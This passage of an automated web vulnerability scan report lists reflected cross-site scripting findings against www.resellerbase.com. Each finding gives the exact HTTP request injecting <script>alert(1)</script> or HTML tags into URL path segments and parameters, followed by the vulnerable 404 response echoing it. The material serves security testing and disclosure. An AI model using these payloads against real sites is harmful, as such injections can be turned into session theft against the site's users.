Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4253032<script>alert(1)</script>8093c8ea8b48715fa/rating.php?id=42&rating=5 was not found on this server.</p>
...[SNIP]...

2.2999. http://www.resellerbase.com/detail/42/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6eddf<script>alert(1)</script>e70a60ca8d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/rating.php6eddf<script>alert(1)</script>e70a60ca8d2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/rating.php6eddf<script>alert(1)</script>e70a60ca8d2 was not found on this server.</p>
...[SNIP]...

2.3000. http://www.resellerbase.com/detail/42/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9bf95<script>alert(1)</script>c922d0b45affe400f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/42/rating.php9bf95<script>alert(1)</script>c922d0b45affe400f?id=42&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/rating.php9bf95<script>alert(1)</script>c922d0b45affe400f?id=42&rating=5 was not found on this server.</p>
...[SNIP]...

2.3001. http://www.resellerbase.com/detail/42/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 78757<script>alert(1)</script>bcc3e508e74726d59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/42/rating.php/78757<script>alert(1)</script>bcc3e508e74726d59?id=42&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/rating.php/78757<script>alert(1)</script>bcc3e508e74726d59?id=42&rating=5 was not found on this server.</p>
...[SNIP]...

2.3002. http://www.resellerbase.com/detail/42/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c5e85<script>alert(1)</script>36ae416770a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/rating.php?c5e85<script>alert(1)</script>36ae416770a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/rating.php?c5e85<script>alert(1)</script>36ae416770a=1 was not found on this server.</p>
...[SNIP]...

2.3003. http://www.resellerbase.com/detail/42/rivcash-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/rivcash-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dd9e4<script>alert(1)</script>de0ca81ae25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildd9e4<script>alert(1)</script>de0ca81ae25/42/rivcash-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildd9e4<script>alert(1)</script>de0ca81ae25/42/rivcash-com.html was not found on this server.</p>
...[SNIP]...

2.3004. http://www.resellerbase.com/detail/42/rivcash-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/42/rivcash-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8a66d<a>447fc7f8c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/428a66d<a>447fc7f8c7/rivcash-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/428a66d<a>447fc7f8c7/rivcash-com.html was not found on this server.</p>
...[SNIP]...

2.3005. http://www.resellerbase.com/detail/42/rivcash-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/rivcash-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6db0f<script>alert(1)</script>da298dd9905 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/6db0f<script>alert(1)</script>da298dd9905 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/6db0f<script>alert(1)</script>da298dd9905 was not found on this server.</p>
...[SNIP]...

2.3006. http://www.resellerbase.com/detail/42/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c3219<script>alert(1)</script>7167d6d94eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc3219<script>alert(1)</script>7167d6d94eb/42/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc3219<script>alert(1)</script>7167d6d94eb/42/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3007. http://www.resellerbase.com/detail/42/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7c9bc<script>alert(1)</script>97a534ecef8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/427c9bc<script>alert(1)</script>97a534ecef8/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/427c9bc<script>alert(1)</script>97a534ecef8/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3008. http://www.resellerbase.com/detail/42/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 67c22<script>alert(1)</script>6c6034a50a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/search.php67c22<script>alert(1)</script>6c6034a50a4?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/search.php67c22<script>alert(1)</script>6c6034a50a4?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3009. http://www.resellerbase.com/detail/42/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/42/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9d84d<a>d7bd3fe29b6 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/search.php?keyword=search...&Submit3=Search9d84d<a>d7bd3fe29b6&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/search.php?keyword=search...&Submit3=Search9d84d<a>d7bd3fe29b6&opt=2 was not found on this server.</p>
...[SNIP]...

2.3010. http://www.resellerbase.com/detail/42/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/42/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 6bfb0<a>a8b35bd5189 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/search.php?keyword=search...6bfb0<a>a8b35bd5189&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/search.php?keyword=search...6bfb0<a>a8b35bd5189&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3011. http://www.resellerbase.com/detail/42/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 21ad4<script>alert(1)</script>d82b2d18064 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/search.php?keyword=search...&Submit3=Search&opt=2&21ad4<script>alert(1)</script>d82b2d18064=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/search.php?keyword=search...&Submit3=Search&opt=2&21ad4<script>alert(1)</script>d82b2d18064=1 was not found on this server.</p>
...[SNIP]...

2.3012. http://www.resellerbase.com/detail/42/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/42/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload f8d67<a>667639d24de was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/search.php?keyword=search...&Submit3=Search&opt=2f8d67<a>667639d24de HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/search.php?keyword=search...&Submit3=Search&opt=2f8d67<a>667639d24de was not found on this server.</p>
...[SNIP]...

2.3013. http://www.resellerbase.com/detail/42/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0298<script>alert(1)</script>8047e61564b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf0298<script>alert(1)</script>8047e61564b/42/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf0298<script>alert(1)</script>8047e61564b/42/themes/ was not found on this server.</p>
...[SNIP]...

2.3014. http://www.resellerbase.com/detail/42/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bfdff<script>alert(1)</script>c560e2c3af9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42bfdff<script>alert(1)</script>c560e2c3af9/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42bfdff<script>alert(1)</script>c560e2c3af9/themes/ was not found on this server.</p>
...[SNIP]...

2.3015. http://www.resellerbase.com/detail/42/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aa0dd<script>alert(1)</script>26dbcd7bd2e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themesaa0dd<script>alert(1)</script>26dbcd7bd2e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themesaa0dd<script>alert(1)</script>26dbcd7bd2e/ was not found on this server.</p>
...[SNIP]...

2.3016. http://www.resellerbase.com/detail/42/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 52cf5<script>alert(1)</script>9566d96113a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/?52cf5<script>alert(1)</script>9566d96113a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/?52cf5<script>alert(1)</script>9566d96113a=1 was not found on this server.</p>
...[SNIP]...

2.3017. http://www.resellerbase.com/detail/42/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2e0eb<script>alert(1)</script>f8649d05957 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2e0eb<script>alert(1)</script>f8649d05957/42/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

